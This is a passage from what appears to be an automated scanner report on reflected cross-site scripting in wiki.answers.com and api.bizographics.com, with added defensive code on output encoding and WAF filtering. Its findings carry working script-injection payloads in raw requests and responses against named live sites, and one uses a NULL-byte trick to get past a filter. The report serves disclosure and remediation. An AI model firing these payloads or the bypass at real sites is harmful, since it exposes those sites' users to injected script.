
Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001570f"><script>alert(1)</script>7aada9114c7 was submitted in the REST URL parameter 2. This input was echoed as 1570f"><script>alert(1)</script>7aada9114c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Q/FAQ%001570f"><script>alert(1)</script>7aada9114c7/1873/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:16 GMT
X-Varnish: 519898453
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 41577

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ%001570f"><script>alert(1)</script>7aada9114c7/1873/x26amp" />
...[SNIP]...

3.495. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76672"><script>alert(1)</script>960fa931a3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/187376672"><script>alert(1)</script>960fa931a3c/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:33 GMT
X-Varnish: 519900860
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52187


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/187376672"><script>alert(1)</script>960fa931a3c/x26amp" />
...[SNIP]...

3.496. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4116f"%3balert(1)//fe68ef9022c was submitted in the REST URL parameter 3. This input was echoed as 4116f";alert(1)//fe68ef9022c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
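The two sinks captured in 3.495 (a double-quoted href attribute) and 3.496 (a double-quoted JavaScript string literal) need different encodings, which is the point the remediation text above leaves implicit. The following is an added example, not code from the XSS.CX report or from answers.com: a minimal Node.js renderer that rebuilds both sinks first by plain string concatenation, as the captured responses show, and then with encoding chosen per context. The function names and the page template around the sinks are assumptions; the payloads are the ones from the report's requests, with %3b decoded to ';'.

```javascript
// Added example, not code from the XSS.CX report or from answers.com: the two
// sinks captured in findings 3.495 (href attribute) and 3.496 (double-quoted
// JavaScript string) rebuilt as a minimal renderer, first by string
// concatenation as the captures show, then with encoding chosen per context.
// Function names and the page template around the sinks are assumptions.

// Third path segment as submitted in the report's requests (%3b decoded to ';').
const ATTR_PAYLOAD = '187376672"><script>alert(1)</script>960fa931a3c';
const JS_PAYLOAD = '18734116f";alert(1)//fe68ef9022c';

// Vulnerable: the raw segment lands inside a quoted attribute and inside a
// quoted JS string literal, exactly as in the captured responses.
function renderVulnerable(segment3) {
  const canonical = `<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/${segment3}/x26amp" />`;
  const adCall = `showAdmeldAd("dart_160x600","wikianswers","160x600","atf","_${segment3}/x26amp",admeld_site);`;
  return canonical + '\n' + adCall;
}

// HTML attribute context: encode every character that can terminate a quoted
// attribute value or start a tag.
function encodeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: JSON.stringify escapes quotes, backslashes
// and control characters; '<', '>' and the two JS line terminators are escaped
// as well so the literal can never form </script> inside an inline block or
// split the line the literal sits on.
function encodeJsString(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened: the same template, but each value is encoded for the context it
// lands in (attribute encoding for href, a complete JS literal for the slot).
function renderHardened(segment3) {
  const url = `http://wiki.answers.com/Q/FAQ/${segment3}/x26amp`;
  const canonical = `<link rel="canonical" href="${encodeHtmlAttr(url)}" />`;
  const slot = encodeJsString(`_${segment3}/x26amp`);
  const adCall = `showAdmeldAd("dart_160x600","wikianswers","160x600","atf",${slot},admeld_site);`;
  return canonical + '\n' + adCall;
}

// Triage check: a raw <script> tag, or a quote that is not backslash-escaped
// and is followed by ';alert(', means the payload broke out of its context.
function hasBreakout(rendered) {
  return /<script>/.test(rendered) || /(^|[^\\])";alert\(/.test(rendered);
}

for (const p of [ATTR_PAYLOAD, JS_PAYLOAD]) {
  console.log('vulnerable breakout:', hasBreakout(renderVulnerable(p)),
              '| hardened breakout:', hasBreakout(renderHardened(p)));
}
```

The attribute encoder is enough for the canonical link; it is not enough for the ad call, because `&quot;` is not a JavaScript escape and would simply appear inside the string. Conversely a JS literal is not safe inside an HTML attribute. The slot value is built first and then turned into a complete literal, so the template no longer supplies the surrounding quotes and an attacker cannot supply one either.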

Request

GET /Q/FAQ/18734116f"%3balert(1)//fe68ef9022c/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:34 GMT
X-Varnish: 519900917
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52028


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","wikianswers","160x600","atf","_18734116f";alert(1)//fe68ef9022c/x26amp",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

3.497. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 653cf"%3balert(1)//03b50bd9b91 was submitted in the REST URL parameter 4. This input was echoed as 653cf";alert(1)//03b50bd9b91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/1873/x26amp653cf"%3balert(1)//03b50bd9b91 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:38 GMT
X-Varnish: 519901994
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161671


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","ent/music","160x600","atf","_1873/x26amp653cf";alert(1)//03b50bd9b91",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

3.498. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcea3"><script>alert(1)</script>db96d2302f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/1873/x26ampfcea3"><script>alert(1)</script>db96d2302f0 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:37 GMT
X-Varnish: 1622868671
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161813


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/1873/x26ampfcea3"><script>alert(1)</script>db96d2302f0" />
...[SNIP]...

3.499. http://wiki.answers.com/Q/FAQ/1873/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17fcb"><script>alert(1)</script>92195d490b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. Note that the sink here is the <base href> element rather than the canonical link: it echoes the full request URL including the query string, and it also governs how every relative URL on the page resolves.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/1873/x26amp?17fcb"><script>alert(1)</script>92195d490b4=1 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=hd0boian9748faghsegsfo8ef3; path=/; domain=.answers.com
Set-Cookie: hd0boian9748faghsegsfo8ef3=n%3A0%3A%7B%7D; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:27:53 GMT
X-Varnish: 519894805
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161527


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q/FAQ/1873/x26amp?17fcb"><script>alert(1)</script>92195d490b4=1" target="_top">
...[SNIP]...

3.500. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dfa3"><script>alert(1)</script>e28327de2d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q9dfa3"><script>alert(1)</script>e28327de2d6/FAQ/2637/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:04 GMT
X-Varnish: 519896591
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 77437


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q9dfa3"><script>alert(1)</script>e28327de2d6/FAQ/2637/x26amp" target="_top">
...[SNIP]...

3.501. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066e4d"><script>alert(1)</script>cdb01e18013 was submitted in the REST URL parameter 2. This input was echoed as 66e4d"><script>alert(1)</script>cdb01e18013 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. Although the server answers 404 Not Found, the error page still reflects the input into the canonical link; in the captured response the NUL survives re-encoded as %00 while the quote and the tags are emitted raw.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte: the filter inspects only the bytes before the NUL, while the length-aware application behind it processes the whole value. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
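The mechanism above is easy to reproduce offline. The following is an added example, not code from the XSS.CX report or from any WAF product: a stand-in for a native-code filter that reads the decoded path segment as a NUL-terminated C string, next to a length-aware application that echoes the whole value into the canonical link as in 3.501, and a corrected filter that inspects the full string and rejects NUL outright. The blocked-character list, the function names and the page template are assumptions; the real filter in front of wiki.answers.com is not visible in the report.

```javascript
// Added example, not code from the XSS.CX report or from any WAF product: a
// model of the NULL-byte bypass described for finding 3.501. Names, the
// blocked-character list and the page template are assumptions.

// Assumed blocklist: characters that break out of a double-quoted attribute.
const BLOCKED = /["<>]/;

// Emulates a C-style string view: everything after the first NUL is invisible.
function nulTerminatedView(s) {
  const i = s.indexOf('\u0000');
  return i === -1 ? s : s.slice(0, i);
}

// Native-style WAF: percent-decodes the segment, then inspects it as a C string.
function nativeWafBlocks(rawSegment) {
  return BLOCKED.test(nulTerminatedView(decodeURIComponent(rawSegment)));
}

// Corrected filter: length-aware, inspects the full decoded value and rejects
// a NUL outright, since it has no legitimate use in a URL path segment.
function fixedWafBlocks(rawSegment) {
  const decoded = decodeURIComponent(rawSegment);
  return decoded.includes('\u0000') || BLOCKED.test(decoded);
}

// The application (length-aware strings, as in PHP or Java) sees the whole
// value and echoes it into the canonical link, as the captured response does.
function appRender(rawSegment) {
  const decoded = decodeURIComponent(rawSegment);
  return `<link rel="canonical" href="http://wiki.answers.com/Q/${decoded}/2637/x26amp" />`;
}

// Outcome of one request against a given filter:
// 'blocked', 'reflected' (script tag reaches the page) or 'safe'.
function outcome(rawSegment, wafBlocks) {
  if (wafBlocks(rawSegment)) return 'blocked';
  return /<script>/.test(appRender(rawSegment)) ? 'reflected' : 'safe';
}

// REST URL parameter 2 from the report, without and with the leading %00.
const PLAIN = 'FAQ66e4d"><script>alert(1)</script>cdb01e18013';
const WITH_NUL = 'FAQ%0066e4d"><script>alert(1)</script>cdb01e18013';

for (const seg of [PLAIN, WITH_NUL]) {
  console.log(seg.slice(0, 8) + '...', 'native:', outcome(seg, nativeWafBlocks),
              'fixed:', outcome(seg, fixedWafBlocks));
}
```

The native filter sees only `FAQ` once the NUL is in front of the payload, so the request passes and the application reflects the tags; the corrected filter blocks both variants. The filter is only a mitigation either way: the output encoding of the canonical link is the actual fix.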

Request

GET /Q/FAQ%0066e4d"><script>alert(1)</script>cdb01e18013/2637/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:14 GMT
X-Varnish: 1622865284
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 41578

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ%0066e4d"><script>alert(1)</script>cdb01e18013/2637/x26amp" />
...[SNIP]...

3.502. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae049"><script>alert(1)</script>ee6b216fa7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637ae049"><script>alert(1)</script>ee6b216fa7b/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:31 GMT
X-Varnish: 1622867720
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151300


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/2637ae049"><script>alert(1)</script>ee6b216fa7b/x26amp" />
...[SNIP]...

3.503. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2586e"%3balert(1)//1842f1efae8 was submitted in the REST URL parameter 3. This input was echoed as 2586e";alert(1)//1842f1efae8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/26372586e"%3balert(1)//1842f1efae8/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:32 GMT
X-Varnish: 519900736
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52028


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","wikianswers","160x600","atf","_26372586e";alert(1)//1842f1efae8/x26amp",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

3.504. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22050"%3balert(1)//7394ecf9e68 was submitted in the REST URL parameter 4. This input was echoed as 22050";alert(1)//7394ecf9e68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/2637/x26amp22050"%3balert(1)//7394ecf9e68 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:36 GMT
X-Varnish: 1622868509
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151159


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","ent/music","160x600","atf","_2637/x26amp22050";alert(1)//7394ecf9e68",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

3.505. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb30d"><script>alert(1)</script>8795961619a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637/x26ampfb30d"><script>alert(1)</script>8795961619a HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:35 GMT
X-Varnish: 1622868195
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151300


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/2637/x26ampfb30d"><script>alert(1)</script>8795961619a" />
...[SNIP]...

3.506. http://wiki.answers.com/Q/FAQ/2637/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04ca"><script>alert(1)</script>1e97e1450d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637/x26amp?f04ca"><script>alert(1)</script>1e97e1450d6=1 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=a5sui7s5guog0npukb22o6fja3; path=/; domain=.answers.com
Set-Cookie: a5sui7s5guog0npukb22o6fja3=n%3A0%3A%7B%7D; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:27:51 GMT
X-Varnish: 519894247
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151015


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q/FAQ/2637/x26amp?f04ca"><script>alert(1)</script>1e97e1450d6=1" target="_top">
...[SNIP]...

3.507. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4519c<script>alert(1)</script>988454ab8a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. Note also that this response is a 403 served with Content-Type: text/plain; a browser that honours the declared type renders the body as text and will not execute the injected script, so exploitation additionally depends on the client sniffing the content as HTML.
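The findings in this report fall into three sink contexts: plain text between tags (3.507), a quoted HTML attribute (3.495, 3.498 and others) and a quoted JavaScript string (3.496, 3.508 to 3.510). When re-checking a large scanner report it helps to recover that classification from the raw response rather than trust the summary line. The following is an added example, not part of the XSS.CX report or of the scanner that produced it: a triage helper that locates a payload in a captured body and names its context. The sample bodies are constructed here, shortened from the response excerpts of 3.495, 3.496, 3.507 and 3.509; the function names are assumptions.

```javascript
// Added example, not part of the XSS.CX report or of the scanner behind it:
// a triage helper that finds a scanner payload in a captured response body and
// names the sink context the way the report's "Issue detail" lines do.
// Sample bodies are constructed, shortened from the report's response excerpts.

// Returns the quote character still open at the end of `region`, or null.
// Backslash escapes are honoured only inside JavaScript (HTML has none).
function openQuote(region, honourBackslash) {
  let open = null;
  for (let i = 0; i < region.length; i++) {
    const c = region[i];
    if (honourBackslash && open !== null && c === '\\') { i++; continue; }
    if (open === null && (c === '"' || c === "'")) open = c;
    else if (c === open) open = null;
  }
  return open;
}

// Classifies where `payload` first lands in `body`. Pass isScriptResource=true
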